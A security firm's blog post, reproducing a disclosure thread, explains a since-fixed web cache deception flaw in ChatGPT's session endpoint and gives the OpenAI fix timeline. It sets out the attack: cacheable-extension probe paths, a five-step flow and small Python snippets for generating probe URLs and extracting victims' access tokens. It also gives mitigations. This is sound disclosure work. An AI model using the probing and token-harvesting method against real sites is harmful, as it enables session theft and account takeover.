Security Research

Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT


Our founder worked together with OpenAI's team to fix an account takeover vulnerability that affected ChatGPT via Web Cache Deception, what appears to be the first web-based vulnerability reported against the most innovative product of this generation. Read more in the detailed Twitter thread below.

Blog Details as per the Twitter Thread

The team at @OpenAI just fixed a critical account takeover vulnerability I reported a few hours ago affecting #ChatGPT. It was possible to take over someone's account, view their chat history, and access their billing information without them ever realizing it. Breakdown below.

The vulnerability was "Web Cache Deception", and I'll explain in detail how I managed to bypass the protections in place on https://chat.openai.com. It's important to note that the issue is fixed, and I received a "Kudos" email from @OpenAI's team for my responsible disclosure.

While exploring the requests that handle ChatGPT's authentication flow, I was looking for any anomaly that might expose user information. The following GET request caught my attention: https://chat.openai[.]com/api/auth/session

Basically, whenever we log in to our ChatGPT instance, the application fetches our account context from the server: our email, name, image, and accessToken. It looks like the attached image below:
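Based on the fields named above, the session response body looks roughly like the following. This is an illustrative shape only; any field names or nesting beyond email, name, image, and accessToken are assumed, not taken from OpenAI's actual schema:

```python
import json

# Illustrative shape of the /api/auth/session response body.
# Field names beyond those mentioned in the text are assumptions.
sample_session = json.dumps({
    "user": {
        "name": "Jane Doe",
        "email": "jane@example.com",
        "image": "https://example.com/avatar.png",
    },
    "accessToken": "eyJhbGciOi...",  # placeholder JWT used to authorize API calls
})

print(json.loads(sample_session)["user"]["email"])
```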

One common way to leak this kind of information is to exploit "Web Cache Deception" against the server. I've managed to find it several times already in live hacking events, and it's also well documented across various blogs, such as: https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html

At a high level, the vulnerability is quite simple: if we manage to force the load balancer into caching our request on a specially crafted path of ours, we will be able to read our victim's sensitive data from the cached response. It wasn't straightforward in this case.

In order for the exploit to work, we need the CF-Cache-Status response header to report a cache "HIT", which means the data was cached and will be served to the next request from the same region. Instead, we receive a "DYNAMIC" response, meaning the data wouldn't be cached.
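The HIT/MISS semantics can be sketched with a toy cache keyed by request path. This is a deliberately simplified model of an edge cache, not Cloudflare's actual logic:

```python
class ToyEdgeCache:
    """Minimal model of an edge cache: the first request for a key misses
    and stores the response; later requests for the same key are a HIT."""

    def __init__(self):
        self.store = {}

    def fetch(self, path, origin):
        if path in self.store:
            return self.store[path], "HIT"
        body = origin(path)
        self.store[path] = body
        return body, "MISS"


cache = ToyEdgeCache()
origin = lambda path: f"response for {path}"

_, status1 = cache.fetch("/api/auth/session/test.css", origin)
_, status2 = cache.fetch("/api/auth/session/test.css", origin)
print(status1, status2)  # MISS HIT
```

In the real attack, the second fetch is the attacker's: they receive the victim's cached response instead of their own.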

Now, getting to the interesting part. When we deploy web servers, the main goal of caching is to serve heavy resources faster to the end user, mostly JS / CSS / static files. Cloudflare has a list of default file extensions that get cached behind their load balancers: https://developers.cloudflare.com/cache/about/default-cache-behavior/

"Cloudflare only caches based on file extension and not by MIME type"

Basically, if we manage to find a way to load the same endpoint with one of the file extensions from that list, while forcing the endpoint to keep returning the sensitive JSON data, we will be able to have it cached.
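The extension-based decision can be sketched like this. Only a handful of Cloudflare's default-cached extensions are listed here; the full set is in the documentation linked above:

```python
# Subset of extensions Cloudflare caches by default (full list in their docs).
DEFAULT_CACHED_EXTENSIONS = {"css", "js", "jpg", "jpeg", "png", "gif", "ico", "svg", "woff2"}


def cached_by_default(path: str) -> bool:
    """Return True if the path's file extension is on the default-cache list.
    Note: the decision is based on extension only, not the response MIME type."""
    ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    return ext in DEFAULT_CACHED_EXTENSIONS


print(cached_by_default("/api/auth/session"))           # False
print(cached_by_default("/api/auth/session/test.css"))  # True
```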

So, the first thing I tried was to fetch the resource with a file extension appended to the endpoint, and see whether it would throw an error or return the original response:

chat.openai[.]com/api/auth/session.css -> 400 - didn't work

chat.openai[.]com/api/auth/session/test.css -> 200 - success
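Probing for this behavior amounts to generating both variants for each candidate cacheable extension: the extension appended directly, and the extension on an extra path segment. A sketch (the segment name `test` is arbitrary, and actually issuing the requests is left as a comment since it needs a live session):

```python
def probe_urls(base: str, extensions=("css", "js", "ico")) -> list:
    """Generate candidate URLs for a web cache deception probe:
    both 'endpoint.ext' and 'endpoint/segment.ext' variants."""
    urls = []
    for ext in extensions:
        urls.append(f"{base}.{ext}")       # e.g. /api/auth/session.css  (400 here)
        urls.append(f"{base}/test.{ext}")  # e.g. /api/auth/session/test.css (200)
    return urls


for url in probe_urls("https://chat.openai.com/api/auth/session"):
    print(url)
    # An authenticated GET to each URL would follow, checking whether
    # the sensitive JSON is still returned with a 200 status.
```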

This was very promising: @OpenAI would still return the sensitive JSON with a .css file extension. It might have been due to a faulty regex, or simply because they hadn't considered this attack vector. Only one thing left to check: whether we could pull a "HIT" from the LB cache server.

And perfect, we had our full chain working as planned.

Attack Flow:

1. Attacker crafts a dedicated .css path of the /api/auth/session endpoint.

2. Attacker distributes the link (either directly to a victim or publicly).

3. Victims visit the legitimate link.

4. Response is cached.

5. Attacker harvests JWT credentials. Access granted.
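Once the poisoned path is cached, the harvesting step in the flow above is just a GET to the same path and a JSON parse. A sketch against a stand-in response body (the `accessToken` field name comes from the session response described earlier; everything else here is illustrative):

```python
import json


def harvest_token(cached_body: str):
    """Extract the accessToken field from a cached session response,
    or return None if the body isn't valid JSON."""
    try:
        return json.loads(cached_body).get("accessToken")
    except json.JSONDecodeError:
        return None


# Stand-in for the body the attacker would fetch from the cached .css path.
cached_body = '{"user": {"email": "victim@example.com"}, "accessToken": "eyJ..."}'
print(harvest_token(cached_body))  # eyJ...
```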


Mitigations:

1. Manually instruct the caching server not to cache the endpoint, via a regex rule (this is the fix @OpenAI chose).

2. Don't return the sensitive JSON response unless the exact endpoint is requested directly: http://chat.openai.com/api/auth/session != http://chat.openai.com/api/auth/session/test.css
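The second mitigation can be implemented as a strict path check on the server before the sensitive JSON is returned. A minimal sketch, not OpenAI's actual code:

```python
def session_path_is_exact(request_path: str) -> bool:
    """Only serve the sensitive JSON when the request path matches the
    endpoint exactly; reject suffixed variants such as
    /api/auth/session/test.css or /api/auth/session.css."""
    return request_path.rstrip("/") == "/api/auth/session"


print(session_path_is_exact("/api/auth/session"))           # True
print(session_path_is_exact("/api/auth/session/test.css"))  # False
```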

Vulnerability Disclosure Process from @OpenAI:

1. Email sent at 19:54 to disclosure@openai.com

2. First response 20:02

3. First fix attempt 20:40

4. Production fix 21:31

That's a wrap from my side. Although I didn't receive any financial compensation, it feels good to improve the security posture of such an innovative product.

A few notes:

1. Security is hard.

2. Adopt the power of the crowd.

3. Kudos on fast production fix.

Enjoyed this read?

Interested in discovering how Shockwave's Next-Gen Attack Surface Management platform can provide continuous monitoring of your external assets and identify exploitable risks? Drop your email below to stay informed.
